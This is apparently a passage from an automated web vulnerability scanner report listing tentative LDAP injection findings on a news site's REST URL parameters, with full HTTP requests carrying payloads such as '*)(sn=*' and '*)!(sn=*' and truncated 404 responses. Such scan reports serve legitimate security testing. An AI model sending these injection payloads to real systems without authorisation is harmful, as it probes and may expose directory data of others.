P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:25:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=524640739&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=524640739&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /67c3b1d04dfaf8d4)!(sn=*/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:25:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1770697822&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1770697822&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

2.17. http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink

Issue detail

The REST URL parameter 5 appears to be vulnerable to LDAP injection attacks.

The payloads 712d97ecb1068be9)(sn=* and 712d97ecb1068be9)!(sn=* were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /_news/2011/01/27/712d97ecb1068be9)(sn=* HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:31:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1621289623&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1621289623&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

Request 2

GET /_news/2011/01/27/712d97ecb1068be9)!(sn=* HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:31:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=426617426&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=426617426&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

2.18. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:53:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=719173227&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=719173227&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /*)!(sn=*/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:53:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1350418144&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1350418144&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

2.19. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The REST URL parameter 5 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /_news/2011/01/28/*)(sn=*/?GT1=43001 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sat, 29 Jan 2011 23:54:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=2050009309&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=2050009309&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

Request 2

GET /_news/2011/01/28/*)!(sn=*/?GT1=43001 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sat, 29 Jan 2011 23:54:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=521615266&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=521615266&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

2.20. http://technolog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_static/feeds/3147.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /_static/feeds/*)(sn=* HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350377678

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
